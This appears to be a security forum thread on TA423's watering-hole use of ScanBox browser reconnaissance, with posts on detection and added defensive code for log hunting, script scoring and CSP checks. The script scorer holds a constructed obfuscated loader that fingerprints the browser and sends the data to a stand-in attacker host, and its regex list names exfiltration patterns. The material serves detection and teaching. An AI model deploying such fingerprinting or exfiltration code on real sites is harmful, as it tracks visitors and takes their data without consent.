
TA423 Strikes Again: ScanBox Recon in Watering Hole Attacks

DarkWeb_Monitor_Eve 3/26/2026

Just caught the Threatpost report on APT TA423 utilizing watering holes to deploy the ScanBox reconnaissance framework. While the headline mentions a keylogger, ScanBox is more concerning for its initial profiling capabilities. It's purely JavaScript-based, which makes it a nightmare for traditional EDR solutions that focus on file-system artifacts.

The attackers are likely compromising legitimate vertical-specific sites to infect targets. Once a victim visits, the JS payload executes immediately to gather system fingerprints without any second-stage payload initially.

Here is a simplified example of the type of browser profiling logic often seen in these campaigns:

// Canvas fingerprinting: draw fixed text and return the rendered pixels as a
// data URL. Anti-aliasing, font stack, GPU and driver differences make the
// output a stable per-device identifier. Runs only in a browser (needs a DOM).
function getFingerprint() {
    var canvas = document.createElement('canvas');
    var ctx = canvas.getContext('2d');
    var txt = 'ScanBox Recon';
    ctx.textBaseline = "top";
    ctx.font = "14px 'Arial'";
    ctx.fillStyle = "#f60";
    ctx.fillText(txt, 2, 15);
    return canvas.toDataURL();
}

For detection, since the malicious code runs in the browser, we need to lean heavily on network telemetry and proxy logs. I've been tuning our SIEM to look for long-duration connections or unusual data POSTs to endpoints that don't match the site's legitimate traffic patterns.

Basic hunting query (KQL):

DeviceNetworkEvents
| where RemoteUrl contains ".js"
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| where NetworkBytes > 100000 // Threshold for large JS blobs
| project Timestamp, DeviceName, RemoteUrl, NetworkBytes

Has anyone else seen similar profiling activity in their logs recently? How are you handling browser-based threats without crippling productivity with strict isolation?
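The proxy-log angle described above, worked through as an added example (this is editor-supplied code, not the poster's SIEM content). It assumes a simple exported log format of "timestamp client method url bytes_out referer"; the site name, baseline hosts, the collection host and every log line are constructed for illustration. The two signals it looks for are a large first POST from a page on the compromised site to a host outside the site's normal dependency set (a serialised fingerprint blob) and regularly spaced follow-up POSTs to the same host (beaconing).

```javascript
// Added example, not code from the thread: hunting for fingerprint-exfiltration
// POSTs in web proxy logs. All hosts and log lines below are constructed, and the
// field order (timestamp client method url bytes_out referer) is an assumed format.
const SITE_HOST = "industry-news.example";                              // watering-hole site
const BASELINE_HOSTS = new Set([SITE_HOST, "cdn.example-static.net"]);  // its normal dependencies

const PROXY_LOG = [
  "2026-03-26T09:00:01Z 10.1.2.3 GET https://industry-news.example/index.html 0 -",
  "2026-03-26T09:00:02Z 10.1.2.3 GET https://industry-news.example/assets/app.js 0 https://industry-news.example/index.html",
  "2026-03-26T09:00:02Z 10.1.2.3 GET https://cdn.example-static.net/jquery.min.js 0 https://industry-news.example/index.html",
  "2026-03-26T09:00:03Z 10.1.2.3 POST https://stat-collect.example-bad.net/i 7421 https://industry-news.example/index.html",
  "2026-03-26T09:00:33Z 10.1.2.3 POST https://stat-collect.example-bad.net/i 512 https://industry-news.example/index.html",
  "2026-03-26T09:01:03Z 10.1.2.3 POST https://stat-collect.example-bad.net/i 498 https://industry-news.example/index.html",
  "2026-03-26T09:01:10Z 10.1.2.3 POST https://industry-news.example/api/comments 210 https://industry-news.example/article/1",
];

function parseLine(line) {
  const [ts, client, method, url, bytesOut, referer] = line.trim().split(/\s+/);
  return {
    ts: Date.parse(ts),
    client,
    method,
    host: new URL(url).hostname,
    bytesOut: Number(bytesOut),
    refererHost: referer === "-" ? null : new URL(referer).hostname,
  };
}

// Group POSTs by (client, destination) where the destination is outside the site's
// baseline but the request was made from a page on the site. Flag a large first
// POST (fingerprint blob) and/or evenly spaced repeats (beaconing).
function findSuspiciousPosts(lines, { minBlobBytes = 2000, minBeacons = 3, jitterSec = 5 } = {}) {
  const groups = new Map();
  for (const raw of lines) {
    const e = parseLine(raw);
    if (e.method !== "POST" || BASELINE_HOSTS.has(e.host) || e.refererHost !== SITE_HOST) continue;
    const key = `${e.client}|${e.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  const findings = [];
  for (const [key, events] of groups) {
    events.sort((a, b) => a.ts - b.ts);
    const [client, host] = key.split("|");
    // intervals[i] is the gap (seconds) between events[i] and events[i+1]
    const intervals = events.slice(1).map((e, i) => (e.ts - events[i].ts) / 1000);
    const reasons = [];
    if (events[0].bytesOut >= minBlobBytes) reasons.push("large-initial-post");
    if (events.length >= minBeacons && Math.max(...intervals) - Math.min(...intervals) <= jitterSec) {
      reasons.push("regular-beacon");
    }
    if (!reasons.length) continue;
    findings.push({
      client,
      host,
      posts: events.length,
      bytesOut: events.reduce((n, e) => n + e.bytesOut, 0),
      intervalSec: intervals.length ? Math.round(intervals.reduce((a, b) => a + b, 0) / intervals.length) : null,
      reasons,
    });
  }
  return findings;
}

console.log(JSON.stringify(findSuspiciousPosts(PROXY_LOG), null, 2));
```

The baseline set is the part that needs care in practice: build it from the site's own traffic over a quiet period rather than by hand, and expect legitimate analytics endpoints to show up as "regular-beacon" until they are added to it.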

NetGuard_Mike 3/26/2026

We saw a similar spike in reconnaissance activity last quarter. The biggest issue is that EDR often misses this because no executable is dropped to disk. We’ve started using content inspection proxies to deobfuscate the JS before it hits the client. It generates some false positives with minified marketing scripts, but it's worth it for the visibility into ScanBox's canvas fingerprinting.
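The content-inspection idea from this reply, and the browser-side profiling logic from the opening post, as one added example (editor-supplied code, not something either poster or any vendor product shipped). It normalises the cheap obfuscation layers a proxy typically meets (hex escapes, split string literals, bracket member access) and then scores the script against a small list of fingerprinting indicators. The indicator names, weights and thresholds are assumptions chosen for illustration; both sample scripts are constructed, and the marketing tag is there to show the grey zone that produces the false positives mentioned above.

```javascript
// Added example, not code from the thread: a static scorer an inspecting proxy
// could run over fetched JavaScript. Indicators, weights and thresholds are
// assumptions for illustration; both sample scripts below are constructed.
const ESCAPE_RE  = /\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})/g;                  // "\x53" -> "S"
const CONCAT_RE  = /(['"])([^'"\\]*)\1\s*\+\s*\1([^'"\\]*)\1/g;               // "get"+"Context" -> "getContext"
const BRACKET_RE = /\[\s*(['"])([A-Za-z_$][\w$]*)\1\s*\]/g;                    // c["toDataURL"] -> c.toDataURL

// Undo the common obfuscation layers so the indicator regexes see plain API names.
function normalize(src) {
  let s = src.replace(ESCAPE_RE, (_, esc) => String.fromCharCode(parseInt(esc.slice(1), 16)));
  let prev;
  do { prev = s; s = s.replace(CONCAT_RE, "$1$2$3$1"); } while (s !== prev);
  return s.replace(BRACKET_RE, ".$2");
}

const INDICATORS = [
  { name: "canvas-fingerprint", weight: 3, re: /getContext\s*\(\s*['"](2d|webgl2?)['"]\s*\)[\s\S]{0,400}?toDataURL\s*\(/ },
  { name: "plugin-enum",        weight: 2, re: /navigator\.(plugins|mimeTypes)\b/ },
  { name: "hardware-probe",     weight: 1, re: /navigator\.(hardwareConcurrency|deviceMemory)\b|screen\.(colorDepth|width|height)\b/ },
  { name: "webrtc-ip-leak",     weight: 3, re: /RTCPeerConnection\b[\s\S]{0,600}?onicecandidate/ },
  { name: "image-exfil",        weight: 2, re: /new\s+Image\s*\(\s*\)\s*\.src\s*=/ },
  { name: "exfil-beacon",       weight: 2, re: /\b(sendBeacon|fetch)\s*\(|new\s+XMLHttpRequest\b/ },
];

// Score = sum of weights of matched indicators. 5+ blocks, 3-4 goes to an analyst
// queue, below that passes. Tune these against your own marketing/analytics tags.
function inspectScript(src) {
  const code = normalize(src);
  const hits = INDICATORS.filter(i => i.re.test(code));
  const score = hits.reduce((n, i) => n + i.weight, 0);
  const verdict = score >= 5 ? "block" : score >= 3 ? "review" : "allow";
  return { score, matched: hits.map(i => i.name), verdict };
}

// Constructed: obfuscated canvas-fingerprinting loader of the kind the thread describes.
const OBFUSCATED_RECON =
  'var c=document.createElement("can"+"vas");var x=c["get"+"Context"]("2d");' +
  'x.fillText("\\x53canBox",2,15);var d=c["toData"+"URL"]();' +
  'var p=navigator["plu"+"gins"].length;new Image().src="https://stat-collect.example-bad.net/i?d="+d+"&p="+p;';

// Constructed: minified marketing tag that also reads screen size and phones home.
const MARKETING_TAG =
  '!function(){var w=screen.width,h=screen.height;fetch("https://tags.example-marketing.com/v",' +
  '{method:"POST",body:JSON.stringify({w:w,h:h,t:document.title})})}();';

console.log("recon    :", JSON.stringify(inspectScript(OBFUSCATED_RECON)));
console.log("marketing:", JSON.stringify(inspectScript(MARKETING_TAG)));
```

The normalisation step is what makes the scorer worth running at a proxy rather than as a plain string match: the canvas indicator only fires once `c["get"+"Context"]` has been folded back to `c.getContext`. Anything built with `eval` or a packer still needs a real deobfuscation stage; this handles only the layers it names.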

Support 3/26/2026

Watering holes are brutal because they bypass the human element of phishing. TA423 is smart about choosing sites their targets actually visit. On the defensive side, make sure you are enforcing strict Content Security Policy (CSP) headers where possible. Restricting script execution to trusted domains can mitigate the impact if the site gets compromised.
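To make the CSP point concrete, an added example (editor-supplied, not from this reply or any framework): a small evaluator that reads a Content-Security-Policy header and reports whether a given script would be allowed to run on the page. It puts a permissive policy next to a restrictive one and runs both against the same set of scripts, including an inline stub and a third-party loader of the kind a compromised page would inject. The page origin, policies and script URLs are constructed; the matcher covers `'self'`, `'unsafe-inline'`, `'none'`, `*`, scheme sources and host sources with wildcard subdomains, and deliberately leaves out nonces, hashes and `'strict-dynamic'`.

```javascript
// Added example, not code from the thread: evaluates whether a script load would be
// permitted by a page's CSP. Policies, origin and URLs below are constructed.
// Simplified: nonces, hashes and 'strict-dynamic' are not modelled.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Does a single source expression (https:, cdn.example.net, *.example.net,
// https://cdn.example.net:443/libs/) match the script URL?
function hostMatches(source, url) {
  const u = new URL(url);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase(); // scheme-source
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^\/:]+)(?::(\d+|\*))?(\/.*)?$/i);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme && u.protocol !== scheme.toLowerCase() + ":") return false;
  const h = u.hostname.toLowerCase(), want = host.toLowerCase();
  if (wildcard ? !h.endsWith("." + want) : h !== want) return false;
  const effectivePort = u.port || (u.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && effectivePort !== port) return false;
  if (path && !u.pathname.startsWith(path)) return false;
  return true;
}

// script is { inline: true } or { url: "https://..." }.
function scriptAllowed(header, pageOrigin, script) {
  const d = parseCsp(header);
  const sources = d["script-src"] || d["default-src"];
  if (!sources) return { allowed: true, reason: "no script-src/default-src: unrestricted" };
  const lower = sources.map(s => s.toLowerCase());
  if (script.inline) {
    const ok = lower.includes("'unsafe-inline'");
    return { allowed: ok, reason: ok ? "'unsafe-inline' present" : "inline script blocked" };
  }
  for (const s of sources) {
    const k = s.toLowerCase();
    if (k === "*") return { allowed: true, reason: "wildcard source" };
    if (k === "'self'") {
      if (new URL(script.url).origin === pageOrigin) return { allowed: true, reason: "'self'" };
      continue;
    }
    if (k.startsWith("'")) continue;                 // 'none', 'nonce-…', 'sha256-…' etc. not modelled
    if (hostMatches(s, script.url)) return { allowed: true, reason: `matched ${s}` };
  }
  return { allowed: false, reason: "no matching source" };
}

const PAGE_ORIGIN = "https://industry-news.example";
const WEAK_CSP   = "default-src * 'unsafe-inline'";
const STRICT_CSP = "default-src 'self'; script-src 'self' https://cdn.example-static.net; object-src 'none'";
const SCRIPTS = [
  { label: "inline recon stub",  inline: true },
  { label: "third-party loader", url: "https://stat-collect.example-bad.net/s.js" },
  { label: "site's own bundle",  url: "https://industry-news.example/assets/app.js" },
  { label: "allowed CDN lib",    url: "https://cdn.example-static.net/jquery.min.js" },
];

function evaluate(header) {
  return SCRIPTS.map(s => ({ label: s.label, ...scriptAllowed(header, PAGE_ORIGIN, s) }));
}

console.log("weak  :", JSON.stringify(evaluate(WEAK_CSP)));
console.log("strict:", JSON.stringify(evaluate(STRICT_CSP)));
```

The restrictive policy still lets the site's own bundle run, which is the catch the reply alludes to: if the attacker modifies a first-party file rather than injecting a new one, `'self'` does not help and you are back to content inspection or subresource integrity on the assets you control.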

RansomWatch_Steve 3/26/2026

We rely heavily on remote browser isolation for our high-risk users. It renders the JS in a sandbox in the cloud, so even if ScanBox executes, it can't reach the host or the internal network. It's not cheap, but compared to the data loss from a reconnaissance phase leading to a full breach, it's a no-brainer for us.


Thread Stats: Created 3/26/2026 | Last Active 3/26/2026 | Replies 3 | Views 128